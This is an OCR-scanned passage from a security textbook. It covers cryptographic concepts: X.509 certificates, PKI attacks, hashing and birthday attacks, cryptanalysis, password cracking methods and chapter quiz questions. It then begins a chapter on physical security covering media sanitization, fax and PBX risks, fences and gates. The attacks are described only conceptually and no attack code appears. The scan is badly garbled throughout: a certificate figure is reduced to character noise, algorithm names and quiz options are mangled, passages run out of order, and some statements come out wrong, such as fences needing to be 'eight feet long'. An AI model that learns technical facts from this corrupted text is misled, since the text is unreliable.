compatibility between CAs, digital certificates are formatted using the X.509 standard. The standard is a commonly used format used in the creation of digital certificates. An X.509 certificate includes the following elements (see Figure 3-6): Version Serial Number Algorithm ED Issuer Validity Not Before Not After Subject Subject Public Key Info Public Key Algorithm Subject Public Key Issuer Unique Identifier (Optional) Subject Unique Identifier (Optional) Extensions (Optional) Clients are usually responsible for requesting certificates and for maintaining the secrecy of their private key. Because loss or a compromise of the private key would mean that communications would no longer be secure, holders of such keys need to be aware of and follow reporting procedures in the event a key is lost or compromised. Loss of a private key could result in compromise of all messages intended for that recipient, even if the key is posted immediately to a CRL. There are seven key management issues that organizations should be concerned with: • Generation • Distribution • Installation • Storage • Key Change • Key Control • Key Disposal • CHAPTER 3 Cryptographic Concepts Certificate FIGURE 3 6 X509 certificate. Yah* A m*l2wib.carij Ctffedo ev 55… key R5A 0 DEI Bits) E^A-jthwitj’ Kev idem-fist KsylD-?f ft 4c 36 20 ]1a* c… Sub j«t KiyUcntlV M4D?briSqQ tO r33adQ… ^Ertanced Key Uf^t Ssr-rtSr Ay^herte*icp ( 1 , 3 ,, , Ptli-Jetscaee Cert Tvna 55L Clertt Authentication. 53. ,., v * > 3D 01 6^ 02 01 Bl 00 ba b7 bl 73 63 67 25 57 20 0 km *2 ml 79 a 18 3. 64 c5 76 92 62 63 54 7a 31 Od 45 19 34 da 11 6b 03 Se 07 2a 02 42 9£ 75 00 31 04 7b 54 01 70 i? 16 al cb cf b2 i9 b6 cd 0« eb c* 24 74 b4 a? lb a* 91 a6 34 da 99 e9 04 36 6d a8 03 d3 3d 35 96 03 ££ 20 33 30 ab 5a 46 7b 70 00 44 dc 1b 96 ol db d4 a? 10 el e3 00 63 a4 70 14 21 60 73 13 42 3c 12 cl c3 £3 cl OK There arc several ways to properly protect keys, including split knowledge and what is known as dual control. Split knowledge and dual control are used to protect the centrally stored secret keys and root private keys, secure the distribution of user tokens, and initialize all crypto- modules in the system to authorize their cryptographic functions within a system, PKI Attacks There are several ways a hacker or malicious individual can target a PKI lor attack: • Sabo ta g e — The PK I com ponents or hard w a re m ay be su b je cted to a number of attacks including vandalism, theft, hardware modification, and insertion of malicious code. Most attacks are designed to cause denial of service (DoS). Communications disruption/modification — These attacks target communications between the subscribers and the PKI components. The disruption could cause DoS, but may also be used by the attacker to mount additional a tt ticks such as impersonation of a subscriber or the insertion of fake information. • Design and implementation flaws — These attacks target flaws in the software or hardware on which the subscriber depends to generate or store key material and certificates, The attacks can result in malfunctions of the software or hardware that may cause DoS. • Operator error — These attacks target improper use of the PKI software or hardware by the operators may result in DoS or the disclosure or modification of subscriber keys and certificates. PART 1 Hacker Techniques and Tools • Operator impersonation — These tit tacks target the user by impersonating a legitimate PKI operator. As an operator, the attacker could do almost anything a legitimate operator could do, including generate keys, issue certificates, revoke certificates, and modify data. • Coercion — These attacks occur when the administrator or operator of a CA is induced into giving up some control over the CA or creating keys and certificates under duress. Hashing A one-way hashing function is a concept in cryptography that is responsible for integrity. It is designed to he relatively easy to compute one way. but hard to undo or reverse. Hashing is designed to provide a unique data fingerprint that will change dramatically in the event of data alteration or tampering. Hashed values or message digests are the result of a variable amount of data being compressed into a fixed-length field. Hashes are not used for encryption, hut for authentication as well as ensuring integrity, A one-way hash function is also known as a fingerprint. Some of the most common hashing algorithms include the following: Message Digest 2 [MD2) — A one-way hash function used in the privacy enhanced mail (PEM) protocols along with .VI D^. It produces a 128-bit hash value for an arbitrary input, It is similar in structure to MD4 and MD5. hut is slower and less secure. Message Digest 4 (MD4) — A one-way hash function that provides a 128-bit hash of the input message. • Message Digest 5 (MD5) An improved and redesigned version of MD4, producing a 128-bit hash. • HAVAL — A variable-length, one-way hash function and modification of MD 5. 1 1 AVAL processes the messages in blocks of 1 .024 bits, twice that of MD5, and is faster than MD5. • Secure Hash Algorithm-!) (SHA-0}— Provides a 160-bit fingerprint SHA-0 is no longer considered secure and is vulnerable to att ticks, • Secure Hash Algorithm-1 (SHA-1) — Processes messages up to 512 bit blocks and adds padding if needed to get the data to added up to the right number of bits, SUA also includes other versions, including SH A-2 5 6 and SHA-512, which are part of the SHA-2 group. The process of hashing is one way, and any change to the data being hashed will result in a completely different hash. An example ol It ashing can be seen in Table 3-3, CHAPTER 3 Cryptographic Concepts table 3-3 The hashin g process. KEYS HASH FUNCTION HASH George Washington e 01 Sakagawea 02 | Abraham Lincoln | 03 Margaret Chase Smith e 04 A hash algorithm can be compromised with a collision, which occurs when two separate and different messages or inputs pass through the hashing process and generate the same value. This behavior can be substantially reduced by choosing algorithms that generate longer hash values. For example, a 160-bit hash is less prone to a collision than a 128-bit hash is. Note that it is unlikely for two intelligible messages to result in a collision. Often a message has to be “padded” with many bytes of filler to achieve the match, which should be an indication to the receiver that something may be wrong. Birthday Attacks A collision is closely related to or borrows from what is sometimes known as the Birthday attack or paradox in probability theory. The paradox is a problem that deals with the probability of individuals sharing the same birthday. Essentially the question is r what is the fewest number of people chosen randomly such that the probability that two have the same birthday is greater than 50 percent. The answer is 23, far fewer than most people would guess. (Fifty-Seven people have a 99 percent probability that at least two have the same birthday.) In cryptography, the goal is to exploit the possibility that two messages might share the same message digests. The attack is based on probabilities in which it finds two messages that hash to the same value (collision) and then exploits it to attack. MD5 can be targeted for a birthday attack. PARTI Hacker Techniques and Tools Common Cryptographic Systems Organizations that store or transmit sensitive information ceio benefit from cryptographic protection. Although current U.S, laws do not place any restrictions on the types and nature of cryptosy stems that can be sold within ILS, borders h exportation of cryptosystems from Lhe I .S, is regulated. In the prist, encryption systems wen: placet! into the same category as munitions or weapons technology so approval from the State Department w r as needed to export the technology. In recent history, however cryptosystems have been reclassified as dual-use technology, so export controls are somewhat more relaxed. One of the problems with controlling the export of crypto systems in today’s world is that lhe Internet allows cryptographic systems to be much more easily used. Another factor that lessens the impact of export controls is the increasingly popularity of non-U.S. cryptographic systems such as the IDEA protocol. Some common cryptographic systems include the following: Message Security Protocol (MSP) The Department of Defense (DoD) Defense Messaging System that provides authentication, integrity, and nonrepudiation services. • SSH — An application that provides secure remote access captibilities. SSII is viewed as a replacement for the insecure protocols FTP, Telnet, and the Berkeley f -utilities. SSII defaults to port 22. SSI Iv 1 has been found to contain vulnerabilities, so it is advisable to useSSHv2. Secure Hypertext Transfer Protocol (S-HTTP} — A superset of Hypertext Transfer Protocol (HTTP I thai was developed to provide secure communication w r ith a Web server. S-HTTP is v\ connectionless protocol that is designed to send individual messages securely, • SSL — Introduced by Netscape as a means tor transmitting information securely over the Internet, Unlike S-HTTP, SSL is application independent. SSL is cryptographic algorithm-independent. The protocol is merely a framework to communicate certificates, encrypted keys, and data. Transport Layer Security (TLS) — Encrypts the communication between a host and clicnl. TLS is composed of two layers^ including the TLS Record Protocol and the TLS Handshake Protocol. » IPSec — An end-lo-end security technology that allows two devices to communicate securely. IPSec w T as developed to address the shortcomings of Internet Protocol version 4 (IPv4). While it is an add-on for IPv4, it is build into IPv6. IPSec can be used to encrypt just the data or the delta and the header. • Password Authentication Protocol (PAP)— Used for authentication, but is not secure because the user name and password is transmitted in clear text. • Challenge Handshake Authentication Protocol (CHAP) — More secure than PAP because of the method used to transfer the user name and passwwd. Its strength is that it uses a hashed value that is valid only for a single logon transaction. • CHAPTER 3 Cryptographic Concepts 75 • Point -to- Point Tunneling Protocol (PPTP) — Developed by a group of vendors, PPTP is composed of two components: the transport that maintEiins the virtual connection and the encryption that ensures confidentiality. Cry plana lysis Cryptographic systems much like any security control have attacks specially designed to exploit weaknesses in the system. In the CEise of encryption, specitic attacks may be more aggressive and targeted because the use of encryption suggests that something of increased value is present and desirable to access. When you examine the strength and power of encryption, It is easy to believe, at least initially, that the technology is unbreakable in all but a few cases. Most encryption can be broken if an attacker has the computing power, creativity, smarts, and sufficient time. Attacks that often work against cryptography include brute-force attack methods, which try every possible sequence of keys until the correct one is found. One problem with the brute-force attack, however, is that as the key lengths grow, so do the power and time required to break them. For example, Y)YS is vulnerable to brute-force attacks, whereas Triple-] )KS encryption is very resistant to brute-force attack. To illustrate this concept, consider Table 3-4. Some attacks that have been and are employed are: Ciphertext-only attack — An attacker has some sample of ciphertext but lacks the corresponding plaintext or the key. The goal is to lind the corresponding plaintext in order to determine how the mechanism works. Ciphertext-only attacks tend to be the least successful based on the fact that the attacker has very limited knowledge at the outset. Known plaintext attack — The attacker possesses the plaintext and ciphertext of one or more messages. The attacker will then use this acquired information to determine the key in use. In reality this attack shares many similarities with brute-force attacks. • Chosen plaintext attack — The attacker is EibJe lo generate the corresponding ciphertext to deliberately chosen plaintext. Essentially, the attacker can “feed 1 ‘ information into the encryption system and observe the output. The attacker may not know the algorithm or the secret key in use. table 3-4 Cryptographic cracking times. USER BUDGET 40-BIT KEY 56-BIT KEY Regular user$400

1 week

40 years

$10,000 12 minutes 556 days ^^^^^ Corporation$300,000

24 seconds

19 days

Large multinational

$10 million .005 seconds 6 minutes Government agency$300 rmHion

.0002 seconds

12 seconds

76

PART 1 Hacker Techniques and Tools

FY!

The best way to protect against attacks on encrypted messages is to take the time to select
a computationally secure encryption algorithm so that the cost of breaking the cipher acts as
a deterrent to making the effort. Keep in mind that this must be periodically reassessed because
what is computationally secure now may not be later. As an example, when DES was released
in 1977 r experts estimated 90 years to brute force a key. Today, it can be done in hours. To date,
there have been no successful attacks documented against AES.

Chosen ciphertext attack — The attacker is able to decrypt a deliberately chosen
cipher text into the corresponding plaintext. Essentially, the attacker can “feed”
information into the decryption system and observe the output. The attacker may
not know the algorithm or the secret key in use. A more advanced version of this
attack is the adaptive chosen ciphertext attack (ACCA), in which the selection
of the ciphertext is changed based on results.

An attack that is successful in some situations is the replay attack, which consists of the
recording and retransmitting of packets on the network. This attack takes place when an
attacker intercepts traffic using a device such as a packet sniffer and then reuses or replays
them at a later time. Replay attacks represent a significant threat for applications that
require authentication sequences due largely to an intruder who could replay legitimate
authentication sequence messages to gain access to a system. A somewhat similar but
more advanced version of this attack is the man -in- 1 he-mid die attack (MitM). which is
carried out when the attacker gets between two users with the goal of intercepting and
modifying packets. Consider that in any situation in which attackers can insert themselves
in the communications path between two users there is the possibility that interception
and modification of information can occur.

Do not forget that social engineering can be effective in attacking cryptographic
systems. End users must be trained on how to protect sensitive items such as private
cryptographic keys from unauthorized disclosure. Attackers are successful if they have
obtained cryptographic keys, no matter how the task was accomplished. If they can

FYJ j-

Countermeasures against replay attacks include Kerberos, nonces, or tirnestarnps. Kerberos
is a single sign-on authentication system that can reduce password posting and secure the
authentication process. A nonce is a number used once. Its value is in adding randomness in
cryptographic systems and authentication protocols to ensure that old communications cannot
be reused. Tirnestarnps are used so that recipients can verify the timeliness of the message
and recognize and/or reject replays of messages as needed.

CHAPTER 3 Cryptographic Concepts

decrypt sensitive information, it is “game over” for the defender. Social engineering
Eil tacks can take many forms, including fooling or coercing a user to accept a self-signed
certificate,, exploiting vulnerabilities in a Web browser, or taking advantage of the certif-
icate approval process to receive a valid certificate and apply it to the attacker’s own site.

Passwords represent one of the most commonly sought after and attacked items in
IT and security. There are several methods that can be employed to attack and obtain

• Dictionary attacks
■ Hybrid attacks

• Brute- force attacks

• Rainbow tables

When examining the problems with passwords and the attacks that can be used,
it is important not to forget some of the reasons why the attacks work, One of the
common problems is the simple fact that many people use ordinary words as their
password. When a user happens Lo choose a password that comes from the dictionary
or is a name, it is much easier for an attacker to obtain the password by using methods
such as a dictionary attack. To crack a password all an attacker has to do is obtain a piece
of software with a dictionary list, which is easily obtainable. In most cases, the dictionary
list or word files contain long lists of various words that have been predefined and can
be quickly downloaded for use. While htiving a dictionary file will work against weak
passwords, there is still the issue of obtaining the passwords in a format that can be
used. To provide protection, passwords are commonly stored in a hashed format instead
of in the clear. If hashing is used to store passwords, it is possible to thwart it by using
an attack technique commonly known as comparative analysis. Simply put. each possible
dictionary word is hashed and then compared with the encrypted password. Once a
until termination or a subsequent m atch is found.

Brute -force password-cracking programs employ a decidedly lower-tech approach to
breaking passwords by attempting every possible combination of characters in varying
lengths. Brute-force attacks will eventually be successful given enough time, but that time
might extend into the millions of years. Brute- force attacks can be very effective if many

■ FYI

One effective attack against authentication systems that make use of a password is a hardware
keylogger. The attacker attaches the device to the computer, waits for users to log or, and
then later retrieves the keylogger with the username and passwords. There are many versions
of ma I ware that do this as well; users inadvertently download the code by visiting an infected
Web site.

78

PART 1 Hacker Techniques and Tools

computers are used in parallel to perform the password search, creating a large network
with the power to do so. Brute-force software has been fine-tuned over the last few years
to work more evidently using techniques designed to decrease their search time by
looking at things such as the password minimum Length, the pEissword maximum length,
and password case sensitivity to further speed the recovery process.

A relative newcomer on the scene of password cracking is an attack that uses
a technique known as rainbow tables, in which a lookup tahle is used to offer a time-
memory tradeoff In layman’s terms, a rainbow table is a database of pre computed
hashes. These hashes are stored and then compared with encrypted password values
with the goal of uncovering a match. Once a value matches the plaintext, the password
is then revealed. The only downside of <i rainbow mhle is the size of the daia generated
and the time taken to initially generate the tables.

CHAPTER SUMMARY

This chapter reviewed the concepts of cryptography. Although an extremely detailed
knowledge of encryption is not necessary, an understanding of the mechanics of
cryptography is important. Symmetric encryption works well ul bulk encryption,
but it does have drawbacks such as problems with key exchange and scalability.

Asymmetric encryption resolves the problems symmetric encryption has with key
exchange and scalability, but is computationally more complex, and thus takes more
processing time. Asymmetric encryption also makes use of two keys c idled key pairs.
In asymmetric encryption, what one key does, the second undoes. Combining symmetric
and asymmetric systems results In a very powerful solution because the best of both
systems can be used. Modern cryptographic systems such as IPSee, SSH, SEX and
others make use of both symmetric and asymmetric encryption.

This chapter also reviewed hashing and how it is used to ensure integrity. When hashing
is implemented into the digital signature process, the user gains integrity, authenticity,
and no n repudiation. Digital signature techniques rely on the creation of a digest or
fingerprint of the information using a cryptographic hash, which can be signed more
efficiently than the en lire message.

Finally, various types of cryptographic attacks were examined, including known
plaintext attacks, ciphertext attacks, man in the middle attacks, and password attacks.
Passwords can be attacked via dictionary, hybrid, brute force, or rainbow tables.

CHAPTER 3 Cryptographic Concepts

r ,

KEY CONCEPTS AND TERMS

Asymmetric encryption
Brute-force attack
Dictionary attack

Hash

Symmetric encryption
Trapdoor functions

CHAPTER 3 ASSESSMENT

1. Which of the following Is not one of the key
concepts of cryptography ?

A, Availability

B, Integrity

C, Authenticity
Q Privacy

1. Common sym metric encryption algorithms
include all of the following except .

A . A

B. AtsS
C IDEA

D, DBS

1. A birthday attack can be used U> attempt Ut break

A, DBS
\L KSA
C FKi
D MUi

1. The best description of Keroi2ation ls_

A, Used to encrypt asymmetric data

B, Used to create an MDS hash

C, Used to cJear media of a kev value

D, Used to encrypt symmetric data

1. What is the primary goal of PK1?

A, Hashing

B, Third-party trust
C Nonreputatlon
D, Availability

1. Digital signatures are wt used for

A. Authentication
li. Nun repudiation

C. integrity

D. Availability

1. Key management Is potentially the biggest
problem in .

A. Hashing

B. Asymmetric encryption

C. Symmetric en cryptic n
11 Cryptanalysis

8.

is welJ suited for bulk encryption.

A. MD=i

IJ. DLijie 1 IcUinaiL
C. DliS
11 RSA

3.

. is Jirt* part of the key man age merit

process.

A. (feneration

B. Storage

C, Distribution

D, Layering

1. Which attack requires the attacker to obtain
several encrypted messages that have been
encrypted using the same encryption algorith

A. Known plaintext attack

B. Cipher text only attack

C. Chosen plaintext attack

D. Random text attack

80

PART 1 Hacker Techniques and Tools

1 1 . What is another name for a one-time pad?

A. Vcrnam cipher

B. DKS

C. Concealment cipher
Q Caesar cipher

1. is an example of a hashing algorithm,

A. MDS

B. DES

C. AES

D. Twofish

1. Which i>f the following is the least secure?

A. PAP

B. CHAP

C. IPSec

CHAPTER

4

Physical Security

WHEN DISCUSSING SECURITY it is easy to get caught up and immersed
in the technology and the attacks associated with it. Take care not to
forget areas such as physical security, however. The assets the security
professional is charged with protecting are not just sitting “in a field” someplace.
Each has facilities and other items surrounding it. Hackers know this fact so
they focus not only on trying to break and subvert technology. They also spend
significant time looking for weaknesses in the facilities and the physical assets
that make structures such as the network possible. If a hacker can gain physical
access to a facility, it is more than possible for that attacker to inflict damage
to the organization by accessing assets that are not properly protected. Some
security experts say that if attackers can achieve physical access to a system
it is under their control, and the battle is lost. Good physical security must be
well thought out and considered. You must carefully consider devices such as
computers, servers, notebooks, cell phones r BlackBerrys, and removable media
and put in place countermeasures to protect them.

A basic example: Companies should position computer screens so that
passersby cannot see sensitive data. They should also create a policy requiring
users to secure their systems when they leave their computer for any reason.

Chapter 4 Topics

This chapter covers the following topics and concepts:

• What basic equipment controls are
■ What physical area controls are

What facility controls consist of

What personal safety controls are and how they work

• What physical access controls are and how they work
How to avoid common threats to physical security
What defense in depth is

81

Chapter 4 Goals

Whan you complete this chapter, you will be able to:

• Define the role of physical security

• Describe common physical controls

• List the purpose of fences

• Describe how bollards are used

• Explain basic types of locks

• Identify how lock picking works

• List the usage of closed -circuit TV (CCTV)

• Describe the concept of defense in depth
» Define physical intrusion detection

• List ways to secure the physical environment

• Detail building design best practices

• Describe alarm systems

J

Basic Equipment Controls

Basic equipment controls are defensive measures placed on the front lines of security.
These controls can be bo I h tin effective first line of defense as well as a visible deterrent
to an attacker Equipment controls represent one layer of defensive measures and
lis such coexist with technologic til and administrative controls.

Keep in mind that there are many different types of controls that regulate access
to equipment, each of which is used to prevent unauthorized Eiccess in some way.
Some basic equipment controls covered in this section include the following:

• Password screen savers and session controls

• Hard drive and mobile device encryption

• Fax machines and public branch exchanges (PBX)

Hard Drive and Mobile Device Encryption

When discussing basic equipment controls another important area you should consider is
the security of portable devices and hard drives, in today’s world there ts an ever-increasing
number of portable devices such as hard drives as well as laptops, tablet PCs, and similar

CHAPTER 4 Physical Security

Health Net Inc. is not the only company to report the loss of data as a result of stolen drives
or systems. In 2006 r the Department of Veterans Affairs (VA) lost the data of 26.5 million
patients as the result of a lost laptop. While there was no evidence that the information had
been accessed, the incident did result in a $20 million settlement. In 200S r the Registered Traveler program in the United States was briefly blocked from taking new applicants after a laptop containing the personal information of 33 r 000 people was lost. The laptop did resurface a week later and did not appear tampered with, but the incident triggered a review of how devices were handled within the program. types of systems. Mobile devices have made working remotely easier but at the same time the devices have introduced problems with the inevitable loss or theft oi” the device and the data it carries. Hard drives with sensitive data represent a real risk for the organization if they are lost, stolen > or misplaced. Consider a report from h ttpJI w ww r sea rchsecurity. com that cited a 2009 case in which Health Net Inc. reported the loss of patient data as the result of a delta security breach that led to the loss of data affecting 1.5 million customers. Tn this case* the breach took place when an external hard drive that contained a mixture of medical data, Social Security numbers, and other personally identifiable information was lost. The solution to such problems is the application of encryption. Encryption can be applied on the file, folder, or an entire hard disk and provide a strong level of protection. Applying encryption to an entire disk is known as full disk encryption or full volume encryption. Full drive encryption, which is a technique that can be implemented in hardware or software, encrypts all the data on a selected volume or disk as selected by the owners of the system. With the widespread availability of full disk encryption, a security professional should evaluate the viability of drive encryption for mobile devices as a solution to theft h loss, and the unauthorized access to data. Software programs such as Pretty Good Privacy (PGP), TrueCrypt, and BitLocker can be used to lock tiles and folders. Microsoft offers data encryption programs such as BitLocker and Encrypted File System (EFS) as part of the operating system in Windows Vista and Windows 20f)(k r ^ Drive Encryption: Yes or No? Drive encryption offers tremendous benefits and should be considered whenever mobile devices are in use. However, it is important to remember that drive encryption isn’t always the best solution or even useful in every case. As the old saying goes, “You don’t get something for nothing” because the cost of using the technology is a bit of processor power. While mobile systems are ideal candidates for full drive encryption, fixed systems that are already in secure areas may not be good candidates for full drive encryption. V PART 1 Hacker Techniques and Tools Be Afraid of Thumb Drives Are you curious about how an attacker can so easily steal data or walk out with sensitive information? It can take nothing more than a thumb drive to do so. If the attacker has ma I ware such as a keylogger, password ripper, or data stealing program loaded on the thumb drive, it could be that just inserting it into a computer couid launch a devastating attack. This technique is commonly used during security assessment. Learn more about this technique at http://www.securityfacus.eom/news/l 1397. While discussing mobile devices, don’t forget the multitude of mobile storage options. Companies used to be concerned about individuals carrying off sensitive information on floppies. In today’s world, however, things have changed due largely to the availability and storage capacities available on new devices. Today, companies have to seriously consider the problems posed by mobile storage. Observe the situation in most workplaces: it is easy to see a sea of iPods h universal serial bus (USB) thumb drives, portable hard drives, cell phones with cameras, and even CD/DVD blanks and burners. Each of these devices has the potential to move massive amounts of information out of an organization quickly and quietly. Think for a moment about today’s most common mobile storage device: the USE flash drive. These devices can carry upwards of 64GB of data in a package that is smaller than a pack of gum. Also consider the fact that USB flash drives Eire common in an ever- increasing number of forms, from watches to Swiss army knives to pens, making them more difficult to detect. A December 2009 report from http:ll w w w. mih to r y . com describes a recent hacking attack that occurred when a South Korean officer failed to remove a USB thumb drive when the system switched from a restricted-access intranet to the Internet. Attackers were able to access top secret information. The examples cited here, as well as countless others* illusl rate ihm even an Item as seemingly harmless as a thumb drive can become dangerous when connected to a system that is part of a network. Under the right conditions, a thumb drive can be loaded with malicious code and inserted into a computer. Because many systems have features such as auto run enabled, the applications run automatically. Just the sheer number of these portable devices [and their small size) raises the concern of network adtrnnlslralors tint! security professionals alike. Asa security professional, one of your bigger challenges is dealing with devices such as thumb drives. While the devices are a definite security risk, they are universally recognized as convenient. The security professional will be required to discuss the security versus convenience issue with management to enlighten all involved of risks inherent in the system and any possible countermeasure. Whatever the decision might be in an organization, there is a need to establish some policies to enforce manage- ment’s decision. This policy should address all types of tried Ui eonlrols, how they are used, and what devices such media can he connected to. CHAPTER 4 Physical Security 85 Organizations should consider the implementation, or appropriate media controls, that dictate how floppy disks h CDs, DVDs, hard drives, portable storage, paper documents, and other forms of media are handled. Controls should dictate how sensitive media will be controlled, handled, and deslirwed in an approved manner. Most important, the organi- zation will need to make a decision about what employees can bring into the company and install on a computer. Included in this discussion will be portable drives, CD burners, cameras, and other devices. Management also needs to dictate how each of these approved forms of storage can he handled. Finally, a decision on how media is to be disposed of must be determined. Media can be disposed of in many acceptable ways, each depending on the type of data it was used to store and the type of media it happens to be. Paper documents can be shredded, CDs can be destroyed, and magnetic media can be degaussed. Hard drives should be sanitized, (Sanitization is the process of clearing all identified content so no data remnants can be recovered.) When sanitization is performed, none of the original information is easily recovered. Some of the methods used for sanitization are as follows: • Drive wiping — Overwriting all information on the drive. As an example. DoD.S2(M).2tf-STD (7) specifies overwriting the drive with a special digital pattern through seven passes. Drive wiping allows the drive to be reused. • Zero ization — A proc es s u s u a I ly a ssoc i a I ed w i t h c r y pt og ra phic processes. The term was originally used with mechanical cryptographic devices. These devices would be reset to 0 to prevent anyone from recovering the key In the electronic realm, zero ization involves overwriting the data with zeros. Zeroization is defined as a standard in ANSI X9.1 A • Degaussing — Permanently destroys the contents of the hard drive or magnetic media. Degaussing works by means of a powerful magnet that uses its field strength to penetrate the media and reverse the polarity of the magnetic particles on the tape or hard disk platters. After media has been degaussed, it cannot be reused. The only method more secure than degaussing is physical destruction. Fax Machines and Public Branch Exchanges While lax machines are nowhere near as popular as they were in the 1990s, they still remain an area of concern for the security prok-ssional. Digital fax machines have been in use since the 1970s and continue to be used. When lax machines were originally designed, it was not with security in mind, so information in faxes is transmitted completely unprotected. Fax transmissions can potentially be intercepted h sniffed, and decoded by the clever and astute attacker. Additionally, once at the destination, faxes typically sit in a tray waiting for the owner to retrieve them t which sometimes takes a long time. Faxes are vulnerable at this point because anyone can retrieve the fax and NOTE In certain situations organizations have taken the step of melting down bard drives tnstead of wiping them. The perception here is that this process makes it impossible to recover the contents of the drive; however, when done correctly, wiping a drive is extremely effective at preventing recovery of data. 86 PA RT 1 H ac ke r Techn iq ues and Too I s MOTE An attacker picking up a fax meant for another individual from a tray can easily go unnoticed. Consider that the recipient of a fax often tells someone to resend instead of asking any questions about where the original fax may have gone. ! > NOTE While PBX systems are typically reserved for large companies and not just anyone can get access, it is not difficult to gain information. A quick Google search for a specific PBX system will, after some investigation, yield information on how to configure and administer a PBX system. With this information in hand, an attacker can hack into a PBX system and perform alt sorts of actions that may go unnoticed. J Voice over IP (VoIP) review its contents. Another issue is that cheap fax machines use ribbons: therefore, anyone with access to the trash can retrieve the ribbon and use it as a virtual carbon copy of the origin ei I document, When performing a security assessment for an organization it is important to take note of tiny fax machines present, what they lily used tor. mid mix policies tJial dieliik. 1 ihe use oi such devices. Worth noting is the fact that most organizations that have fax numbers may not have a physical fax, having replaced the devices with tax servers instead, which are not as obvious to spot These devices can send faxes as well as receive faxes and route them to a user’s e-mail. While it may be argued that this is better than a fax machine, it is not enough to secure the trans- mission of con lid en lia I information by fax. As an additional and more robust level of security, activity logs and exception reports should be collected to monitor for potential security problems. In today’s world, more companies are reliant on a technology known as private branch exchange I PBX) for intra office phone communication, These devices make attractive targets for an attacker, and if mis con figured have the capability to be hacked; under the right conditions, it is possible that an attacker can make anonymous and free phone calls. To secure this portion of the communication infrastructure, default passwords need to be changed, and remote maintenance must be restricted. These systems are not usually run by security! 1 professionals and may not be as secure as the network infrastructure. Individuals that target such devices are known as phreakers. A rapidly growing technology, Voice over IP (VoIP) is more than likely something you will have to address in your security planning. VoIP allows the placing of telephone calls over compuler networks and the Internet. VoIP has the ability to transmit voice signals as data packets over the network in real-time and provide the same level of service as you would expect with traditional phone service. Because voice is transmitted over the network as delta p tickets much like any other data, it is susceptible to most of the attacks that affect regular data transmission, Attacks such as packet sniffing and capture can easily capture phone calls transmitted over the network; in fact, due to the sheer volume of calls that may be placed at any one time, a single a it tick can intercept and affect numerous calls. CHAPTER 4 Physical Security Physical Area Controls 87 When looking Eit the overall security stance of an organization, you have numerous controls to use. each for a different reason. In the physical world, the first controls that someone wishing to cause harm is likely to encounter arc those that line the perimeter of an organization. This perimeter is much like the moat or walls around a castle, designed to provide both a deterrent and a formidable obstacle in the event of an attack. When assessing an organization, pay attention to those structures and controls that extend in and around an organization’s assets or facilities. Every control or structure observed should provide protection either to delay or deter an attack, with the ultimate goal of stopping unauthorized access. While it is possible that, in some cases, a determined attacker will make every effort to bypass the co u n term eas u res in the first layer, additional layers working with and supporting the perimeter defenses should provide valuable detection and deterrent functions. During the construction of new facilities, the security professional should get involved early to give advice on what measures can be imple- mented. It is more than likely, however, that the security professional will arrive on scene long after construction of facilities has been completed. In these cases, a thorough site survey should be conducted with the goal of assessing the current protection offered. If tasked with performing a site survey, do not overlook the fact that natural geographic features can and do provide protection as well as the potential to hide individuals with malicious intent from detection. When surveying an existing facility, consider items such as natural boundaries at the location and fences or walls around the site. Common physical area controls placed at the perimeter of the facility can include many types of physical barriers that will physically and psychologically deter: ■ Fences • Perimeter intrusion detection systems (FIDS) • Gates • • Bollards • Warning signs and notices ■ Trees and foliage Fences Fences are one of the physical boundaries that provide the most visible and imposing deterrent. Depending on the construction, placement, and type of fence in place, it may deter only the casual intruder or a more determined individual. As fences change in construction, height, and even color, they aiso cEin provide a psychological deterrent. For example, consider an eight-foot iron fence with thick bars painted flat black: such a barrier can definitely represent a psychological deterrent. Ideally, a fence should put limit an intruder’s access to a facility as well as provide a psychological barrier. 88 PART 1 Hacker Techniques and Tools Walls in History Almost everyone has heard about the Great Wall of China, built to keep out the Mongols. Two other examples from history of waifs that served as effective barriers are the Berlin Wall and Hadrian’s Wall. The Berlin Wall was put in place to stop the exodus of people from East Germany to the West. Until it was torn down in 1989, the physical and psychological deterrent oi this barrier was obvious to anyone who looked upon the structure. In its final form, the Berlin Wall was a miles-long concrete and steel barrier line that was supplemented with land mines, dogs r guards, antitank barriers, and other mechanisms designed to strike fear into people and prevent escape attempts. Of course, the Berlin Wall did not prevent the occasional escape attempt (100 to 200 people died trying to make their way into the West over the wall). Hadrian’s Wall was put in place by the Roman Emperor Hadrian to stop invaders and mark the edge of his territory. Hadrian’s Wall was an impressive engineering marvel, stretching across a large swath of northern Britain, designed to k.eep out the “barbarians” and serve as a physical manifestation of the edge of the empire. Ultimately, as the empire decayed and fell into ruin, the wall went unmanned, but not before serving its purpose for some time. Depending on the company or organization involved, the goal of erecting a fence may vary from stopping casual intruders to providing a formidable b timer to entry. Fences work well at preventing unauthorized individuals from gaining Eiccess to specific areas, but also force individuals that have or want access to move to specific chokepoints to enter the facility. When determining the type of fence to use. it is important to gel an idea of what the organization may need to satisfy the goals of the security plan. To get a better idea, review Table 4-1, which contains a sampling of fence types and the construction and design of each. Fences should be eight feet long or greater to deter determined intruders. table 4-1 Fence types. TYPE SECURITY MESH GAUGE A Extreme High Sec u r ity 3 fa inch 1 1 gauge li Very High Security 1 inch 9 gauge C High Security 1 inch 1 1 gauge D Greater Security 2 inch 6 gauge E Normal Fencing 2 inch 9 gauge CHAPTER 4 Physical Security In situations where security is even more of a concern, and just the placement of a fence may not be enough, it is possible to layer other protective systems. For example, a perimeter intrusion and detection assessment system (PIDA) can be used. This special fencing system works as an intrusion detection system (IDS) in that it has sensors which can detect intruders. While these systems are expensive, they offer an enhanced level of protection over standard fences., In addition to cost, the downside of these systems is that it is possible that they may produce false positives due to environmental factors such as a stray deer, high winds, or other natural events. Gates Fences are an effective barrier* but they must work in concert with other security measures and structures. A gate is a chokepoint or a point where alt traffic must enter or exit the facility. All gates are not created equal, however, and if you select the incorrect one, you won’t get proper security. In fact, choosing the incorrect gate can even detract from an ol her wise effective security measure, A correctly chosen lj, l 1 1 l”‘ provides iio el iectivc deter renl and ti barrier lluil will slow down an in J ruder, whereas an incorrectly chosen harrier may not deter anyone but the casual intruder. UL Standard number 52 5 describes gate requirements. Gates are divided into the fo llowin g fo u r c I a ss i lie a M t >n s : • Residential or Class 1 — These are ornamental in design and offer little protection from intrusion. Commercial or Class 2 — These are of somewhat heavier construction and fall in the range of three to four feet in height. • Industrial or Class 3 — These are in the range of six to seven feet in height and are of heavier construction, including chain link construction. Restricted Access or Class 4 — These meet or exceed a height of eight feet and are of heavier construction — iron bars or concrete and similar materials. Gates in this category can include enhanced protective measures including barbed wire. Want to Know More? For more detailed information on site security consider the many resources available on this topic. One is RFC 2196_Site Security Handbook. This document provides practical guidance to administrators 